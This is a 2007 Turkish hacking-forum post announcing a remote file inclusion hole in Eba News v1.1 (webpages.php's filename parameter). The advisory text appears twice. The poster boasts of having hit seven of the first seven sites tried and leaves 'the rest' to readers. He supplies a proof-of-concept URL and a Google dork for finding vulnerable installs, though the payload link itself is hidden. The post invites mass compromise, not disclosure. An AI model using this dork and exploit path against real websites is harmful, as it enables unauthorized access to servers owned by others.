SekoMirza
04-20-2007, 07:15 PM
Arkadaşlar yarım saat önce benim tarafımdan bulunmuş bir bugdır ilk 7 sitede 7 yaptım gerisi size kalmış ;)
Kaynak : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------
Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Eba News
version : 1.1
vendor : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
source url : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
Description:
~~~~~~~~
EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.
--------------------------------------------------
Vulnerability:
~~~~~~~~~~~
I found vulnerability script in admin/public/webpages.php
Proof Of Concept:
~~~~~~~~~~~~
eba/admin/public/webpages.php?filename=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
google d0rk:
~~~~~~~
"Eba News"
--------------------------------------------------
Solution:
~~~
- download new version in vendor URL
--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno
--------------------------------------------------
Contact:
~~~
Seko[at]se-ko[dot]info
-------------------------------- [ EOF ]----------
Sorusu Olanlar Buraya Yazarsa Elimden Geldiğince Yardımcı Olmaya Çalışırım!
Kaynak : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------
Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Eba News
version : 1.1
vendor : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
source url : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
Description:
~~~~~~~~
EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.
--------------------------------------------------
Vulnerability:
~~~~~~~~~~~
I found vulnerability script in admin/public/webpages.php
Proof Of Concept:
~~~~~~~~~~~~
eba/admin/public/webpages.php?filename=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------
google d0rk:
~~~~~~~
"Eba News"
--------------------------------------------------
Solution:
~~~
- download new version in vendor URL
--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno
--------------------------------------------------
Contact:
~~~
Seko[at]se-ko[dot]info
-------------------------------- [ EOF ]----------
Sorusu Olanlar Buraya Yazarsa Elimden Geldiğince Yardımcı Olmaya Çalışırım!